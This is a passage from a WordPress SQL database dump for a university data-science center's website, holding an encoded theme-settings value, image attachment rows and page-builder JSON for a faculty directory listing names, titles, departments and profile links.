+cm7kI3Du5CNOiBGgPy3mtT0r5IkaH3mCbCOIPHnXa0aPjzxBthFEnrzrNWNehzxBChREnrwNeWLzarrI7hfz2gZzm9fTpETECSJOEHGCiBNEnCDiBBEniDhBxAkiThBxgogTRJw8X-rlcs+V2Hxv29UNToXOneYt0STu2UAvnsnb+SB69xb5JCnvSzupgu0ZZe2HgPr-t6ZYNbexiyp5W9+BFdI6mVVLpnz-et+M71-3FxvHCGw+-0aYYRCTZ1wcz97abAD6LijTyarB2ty6K74lk92D7rsR6Ubbw35l8bhUk-tFXSdlFZTFY5DdB7ByaTZZu0RXfj9seu5h05MPQR8ltZlPOpKvxwTt6J-aNlpl8Ti+j2ltlld1mdTxdH2ab77RXW17sgGiwcqllf6Oi2xppOIiWx8pd3HDkw-BICfzIMfgWEg8u6iLPhhv6Xfzo51r-JnjwiK13+PCIjUaIg96iDz-f1hG5MEyIq--s7-6+Ja+QEQeHhcW6TFQI2LzUWKRJu8VNbK9xe8fNQLbo5R-tJrjwtbteQZTQDPjsGbGIIFAj1+fBLN58VHUJ1GfHCmzg9Pn9Ei2Zz2SHWFmB6db+gL1SNQjI9g1s4NvPpAtAoKZHZjZcVrHzv7y6adbA8L4E2e10BDBjifORv1F8cyJsxGcStIHZy+dOBsBJn2MKXb5GOY73+Kf5e-WfN-e4rNO+vh0RYB+tumTzQnQn+1fi+SczpmNxOszP-gWL6tAFPsPQbGfz9GZUfQ8bpxvPjozOvXUacSN7w83TqLLmgAVhF8ISoD+9mnjo7vBy2eT0qZPNp-avxYJAssRWI7AcgSWI7AcgeUILEdgOQLLEViOwHIEliPi410Dy6ONwHKbLWZ5enyQcsO2xLbPEVIOEB09BMjAliMqI4QAIQRoXEi5gei5c4blns8ZlscHKTcQbekLhAIhySuoEWLSBuTmKabIO41JP9Pis4aUXzidEaHkJwcll8cPJTdsMxpRIpQc9ciRoOSGwTNQcrlnKLk8Qii5YbClL1B-RCi53BVKbthmzJVEKDlCyY8USg4ErinfACW-saWd3l58TfMis0EV2yyZBNACyzVjEozYDViu+nsPfwZYLk8FWG4YfwlYLhFYPqoQHgNYbtjmLGn5boHlz7T4rIHlN7a0UwK0kW-nBCqXrweVG7YZyisRVL4HUPlPSVE5MHmFnOiHWizPY9sNU5sXBGLbEdv+Rk70VvO2pZ0GlEdKG9Y71gKx64hdR+w6YtcRu47YdcSuI3YdseuIXUfsOmLXEWJy9BF2uecIuzyhCDsiNDHCzqTaOcK+mWpfnj4KEyPs5xZhb-9e5A9pPfWRdaGNYGa3yLruS1j9XGRdnUxkXb8YWVcYWR9T+Op9RtbfLeP6My0+68i6k2YE6EVu88lZBdbN+IH1UzpbGc8cx-j60DWj6Avx9c3M+opifB3j62+Lrzut2+Y2n2BQHYPqGFTHoDoG1TGojkF1DKpjUB2D6hhUx6A6BtVPJqiu9py2rk4obV1h2joG1ZnaOW0dNpMNKkxbx6D6qQXVL7Lkmw+lR0YrLncMpffp5OgzoXR1MknqQF8KpStMUh9V5O4zSV2dXZK6OvMk9QunWF5U6f1ZHXumxs9QV5ihjhnq73OxvJChDpsJBRVmqGMEfbcIev2Y1nVStsFzAtdfsuKRwHVW3Kc54ddlMknLJK5v7Zc6KW+by1cEIri+qNL75KKrNsbYMcaOMfYDxdi5UE2EU4go5IzH65HUNkhCfXy8+SGoCgFU0IX5tIpCo1TQ-O1dYQpCHQEBSgPOZWiYaEOIQrFQ6oBxFUoT9cPETUTUx9ua34qHIKAXExY8jKI2IOfiq4GQoVYRAco1d7EozkLNZS-4TwMQJqTAXRwwAENDyk0AjIdaqn5Qr40L+fb7cKwOIyP6MaU2Ukx78AJXTw0h5awNjQkaSogCVz4AIUNqRNBEjP1vTlmoIu1q617T+0-7UcFCymS-61xEtl-jrn8bkENTnTbu6G4HTJhQsO43RCLUuvmcD4g2sTcPrBA8NCIKevFu9xoClGkVRgQoV8pVu5sukkOoGSdAOUAIUrYBRYfvcB3lBrL54YPtNGDShAaga1nAqQolUwRo87-elTbSSwnQ7knfOQBRGDnEhwyl9mH9gIlQCt3-iO9PI0PQJnCzMfA93zzoJ+n6vOu+L1kYAffxTwY0ZEx172IqCpVmfqW0w9w851ELTIVM64BFEHIhCFAmWcg4x+gkRicxOnmU0ck9p-yqE0r5VZjyi9FJpnZO+YUt0whTfjE6eaopvx+m9uHJs2ozH7CUippo14Cl6K+R5wKWJ5P7C-BiwBJzf0eVwvvM-VVnl-urzjz314k1AvTDokrLZDJ5Oquw5fj5vwrzf-cQtiT8sprbfM2N-qXI6+Cx5zQXlDpP+pcir4Mq-Z40znQ5-9a78cXO0uzJ3frHPMkJ0BubV65EXGRF6e6V93f-JQWBSwJUR+4vk+Zvfa-8htxk52aZ27xz7JzDctIvpAbD5sN2NKYGY2DzbanBd047v2s3seCORnDHDBC4xjAmhjExjImpwpgqjKnCmCqMqcKYKoypwpgqjMF4DMafTDBe7zlVWJ9QqrDGVGEMxjP91hOuNaYKYzD+VIPx-0rzJOkRcCugsHMQXpLdjrbW7+hoa41Zw6NK331mDeuzyxrWZ5413IgzAvTvi5ktCdDLqc0n07M65FqPn0KsMYUYubjf9Zp53VnXGjOJMeD+toD7Q6OBf13MbBnEbrsKgCrJGBMGw+4YdsewO4bdMeyOYXcMu2PYHcPuGHbHsDuG3THsflJh9z3nwOsTyoHXmAOPYXem1VvD7pgDj2H3Yw67i2fC7pWtp4-p1wDW0+A1KG52jcDrXSPw6h1F4DENflRBvM80eH12afD6zNPgb5xkI0Avp8Xj5LwC7+MnwWtMgsck+DNNgjf0VTF5g0nwGJN-W0y+Uc9jt4NhBB4j8BiBxwg8RuAxAo8ReIzAYwQeI-AYgccIPEbgTygCb-ac+G5OKPHdYOI7RuCZeWviu8HEd4zAnywLfZnmE5v5sLuRWioI-5wnO8TdDd0x7m7eUea7wcz3UcXvPjPfzdllvpszz3xv5BkBejUtsnOKupvx090Nprtjuvu7XjOvS3c3mO6OofU38su7fWoyLTIMrGNgHQPrGFjHwDoG1jGwjoF1DKxjYB0D6xhYx8D6SQXW95zabk4otd1gajsG1pl5a2q7wdR2DKyfamC9XNw93c5tGSdZVnXp7dBG2g01USTNbgnuBnYNtL+jBHeDCe6jiuN9Jribs0twN2ee4P55cfdEgP7WSLizirSPn99uML99D5H2n5KichH2CkPs6APYtw8AKN2rDwAoPRkfgHOBog-gvH0AQNnbfABAGfoA0Adwoj6Az0k1ndn8T5ulHbOdYcoIQXeF2IvdLH+g7N1Y-kAZWv5jCmHYn+UPFM7M8u+682yp7VICtCfbzsj2B8rHtv2BcrT9kdvuLLntgIrXAPCBCoIAfATgvwWAX-Z08-tFXi-mNstSxOIjFh+x+IjFRyw+YvERi49YfMTiIxYfsfiIxcc4-EnF4aM9x+GjE4rDRxiHxzg8lW+Nw0uMw2Mc-jjj8JzANaPPxOE-Zul3G9zE08XUE92BYiBgR-h9tGsQXr6jILzEIPyYEljtMwh-+plSQ4Pw6ryD8B+z9LslQG-i6WJ6VgF4PX4A-pSSV5DmDjH4g9eMeV2U3RCMsmOU-ZVR9iqxZTx1kfZFVlcErm2WEbgm-PpLUsfTq6ROylmap1WdxpfZoqqTsvpHnj0RflWXi4SAtLM54R+mSVl8zOu0fvp78kT41aLMCUT8IksJRPziSzW5nZfFlzRLCET84uKyuLi4-Nek5l8-LCwvNP8weaqTS3FTfdXVNL+8ePjPf-4T+9d-TZ4ei3JSEX6VuF01AlrF08XUFynK9D7NCb-6-Mvlz7f--OPj5-+9-f1-f-t48fPHi6vbn3+5+f0fn--Xl26XDOFX1F903fHLhPCrRMlI8QiCKLE8EBFlwZ3RIpgAiwQoxe5i0T2XTgi-+ve--9ZdmSdZdlmUZRLXaZF-zO1dlkzaTmtl+WgeXIRBIAwCYRAIg0AYBMIgEAaBMAiEQSAMAmEQCINAGMSxwyDYnukI2AnRETCkI0AYBLC30hEwpCNAGMTpnvVX5FWReyICHiltVDjPd4FAqB0hEOwd8RAw5CEYVfruk4eAnR0PAYNzP+qvyKsiJ0B-n9pynpwTCoKNT0PAkIbgx6Agzgd3wF6X3c8wux9xB289Xs+puvXUlvMkMHcqEpbdWczvx8A2BrYxsI2BbQxsY2AbA9sY2MbANga2MbCNge2TCmzvOb+fnVB+P8P8fgxsA3trfj-D-H4MbJ9aYPsiv0+y9K9F0oa0FZUAkdgtqz-aOaT9jrL6GWb1jyp395nVz84uq5+deVa-F2gE6L-TLEurswpqj5-azzC1H8-Ve5+L5XU5-Qxz+jG2-rbYuvVa96PbojCmjjF1jKljTB1j6hhTx5g6xtQxpo4xdYypY0wdY+onFFOHPSeLwwkliwMmi2NMHeCtyeKAyeIYUz9iznxqNsTUy-zWdfs8jb8m5W2W3t3WyWx++8V+AZN8iQIp7CQQCY2Cu9jIAJgQsZhEShnq4-ASFJN0tzi85DvG4eEdpZYDppaPKqv3mVoOZ5daDmeeWv5rUU0XlgD95yIti+-nFISH8TPLATPLMbN85Fn6usxywMxyjH6-Lfr9Z1FNFzb4a5GWxfeAs0gxDizCIDgGwTEIjkFwDIJjEByD4BgExyA4BsExCI5BcAyCP1-65XLPldh8b-Vq-zcAgUsCkE4IAOEXTDcXMpvfu0sEYJJ8sYus9qUnT7mdpbG7-8VmVeKu10-zxD-kIy1A1NX-B56yhxCJNggA\"\n            }\n        },\n        \"type\": \"theme_mod\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2024-11-14 14:48:37\"\n    }\n}','','','trash','closed','closed','','bcfcdd01-69fe-49ea-a5db-6bde91d56709','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?p=1874',0,'customize_changeset','',0),(1875,1,'2024-11-14 09:33:11','2024-11-14 14:33:11','','Shreyatadipaneni','','inherit','open','closed','','shreyatadipaneni','','','2024-11-14 09:33:11','2024-11-14 14:33:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2024/11/Shreyatadipaneni.jpg',0,'attachment','image/jpeg',0),(1876,1,'2024-11-14 09:48:17','2024-11-14 14:48:17','','Anshul Gupta','','inherit','open','closed','','anshul-gupta','','','2024-11-14 09:48:17','2024-11-14 14:48:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2024/11/Anshul-Gupta.jpg',0,'attachment','image/jpeg',0),(1877,1,'2024-11-14 09:48:38','2024-11-14 14:48:38','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant 